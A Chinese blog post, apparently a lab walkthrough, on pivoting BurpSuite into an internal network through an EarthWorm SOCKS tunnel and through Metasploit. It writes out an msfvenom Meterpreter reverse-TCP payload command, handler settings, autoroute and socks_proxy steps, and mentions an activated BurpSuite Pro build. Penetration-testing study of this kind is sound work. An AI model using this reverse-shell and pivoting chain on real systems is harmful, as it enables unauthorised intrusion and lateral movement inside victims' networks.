BurpSuite扫内网

有目标就不怕路远。年轻人.无论你现在身在何方.重要的是你将要向何处去。只有明确的目标才能助你成功。没有目标的航船.任何方向的风对他来说都是逆风。因此,再遥远的旅程,只要有目标.就不怕路远。没有目标,哪来的劲头?一车尔尼雷夫斯基

导读:本篇文章讲解 BurpSuite扫内网,希望对大家有帮助,欢迎收藏,转发!站点地址:www.bmabk.com,来源:原文

纸上得来终觉浅,绝知此事要躬行。网上资料怎么写的都有,花了大半天时间整理了一下😔

burpsuite设置socks5代理访问内网

测试环境如下:
在这里插入图片描述

注意事项:关闭跳板机win2012的防火墙,否则可能出现隧道无法正常使用。

  1. 跳板机配置隧道

ew_for_Win.exe -s ssocksd -l 1080
在这里插入图片描述

  1. 配置BurpSuite

在这里插入图片描述

  1. 访问内网机器

在这里插入图片描述

burpsuite设置上游代理访问内网

msf拿下站点,如何转给BurpSuite?
拓扑图如下:
在这里插入图片描述

1. msfvenom生成木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.239.141 lport=4455 -f exe >r.exe
然后msf开启监听

msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost  192.168.239.141
msf6 exploit(multi/handler) > set lport 4455
msf6 exploit(multi/handler) > exploit 

2. 跳板机win2012运行木马

3. msf获取shell

在这里插入图片描述

4. msf起路由

可以参考之前的文章:https://www.yuque.com/u1881995/pborfs/nf2nn5#rAXIQ
4.1 查看网络接口信息:run get_local_subnets
4.2 以CIDR的方式添加路由信息:run autoroute -s 192.168.195.0/24
4.3 查看活动路由列表,确认路由情况:run autoroute -p
在这里插入图片描述

5. 配置socks_proxy

配置socks_proxy,并运行

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy 
msf6 auxiliary(server/socks_proxy) > show options 

Module options (auxiliary/server/socks_proxy):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        Proxy password for SOCKS5 listener
   SRVHOST   0.0.0.0          yes       The address to listen on
   SRVPORT   1080             yes       The port to listen on
   USERNAME                   no        Proxy username for SOCKS5 listener
   VERSION   5                yes       The SOCKS version to use (Accepted: 4a, 5)


Auxiliary action:

   Name   Description
   ----   -----------
   Proxy  Run a SOCKS proxy server


msf6 auxiliary(server/socks_proxy) > exploit 

下图中可以看到,没有socks4a了,取而代之的是auxiliary/server/socks_proxy,但是在配置选项,可以看到其支持5和4a两种,这里就用默认的5就行,不需要做额外配置,直接运行。
在这里插入图片描述

6. 配置windwos

这个时候先缕一缕思路啊,跳板机直通内网,kali通过添加路由能间接通向内网。现在是如何让win7与kali之间建立隧道联系。在第5步中,msf开启socks连接,win7只需要把流量发到kali的1080端口即可。

6.1 测试win7联通内网web

我这里使用插件SwitchyOmega配置一个代理,指明协议(kali使用socks5)、kali的地址和kali监听的端口
在这里插入图片描述

试着访问一下,发现完全OK
在这里插入图片描述

此时让我们再来捋一下思路。

  1. win2012直通内网靶机
  2. msf直通win2012,通过添加路由,间接通向内网靶机
  3. win7直通kali,通过访问msf的socks5连接,将流量发送到kali
  4. 最终的体验效果,就像是win7可以通过浏览器访问内网debian的web服务

在这里插入图片描述

这里,就已经证明网络是通的了,下面就可以去设置BurpSuite了

6.2 设置BurpSuite

这里有个问题,我要使用BurpSuite,怎么玩呢?我们知道,win7是通过socks5协议与msf建立连接的,那么,我可以让win7的浏览器走BurpSuite,BurpSuite再把流量转发给本地的Socks代理工具,再由代理工具把流量发给msf即可。如下图
在这里插入图片描述

  1. 以管理员身份启动SocksCap64,它才可以导入本机安装的浏览器。首次启动画面如下

在这里插入图片描述

在这里插入图片描述

  1. 添加代理

完事后点击右侧的“保存”按钮即可。
在这里插入图片描述

  1. 测试网络是否通畅

在这里插入图片描述

  1. 开启全局代理

SocksCap64监听本地的25378端口
在这里插入图片描述

  1. BurpSuite设置顶级代理访问内网

在这里插入图片描述

上面内容是英文的,就啰嗦一下上面写的都是啥玩意吧。拿中文版的BurpSuite解释一下。
5.1 额外介绍的内容
以经典的burpsuite_pron_v2.1.07为例,安装java,激活BurpSuite之后,点击“创建桌面快捷方式.bat”,就会在桌面创建一个图标。在这里插入图片描述

5.2 点击桌面的BurpSuite图标
在这里插入图片描述

  1. BurpSuite可以使用了

在这里插入图片描述
可以正常使用重放模块
在这里插入图片描述

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/134275.html

(0)
飞熊的头像飞熊bm

相关推荐

发表回复

登录后才能评论
极客之音——专业性很强的中文编程技术网站,欢迎收藏到浏览器,订阅我们!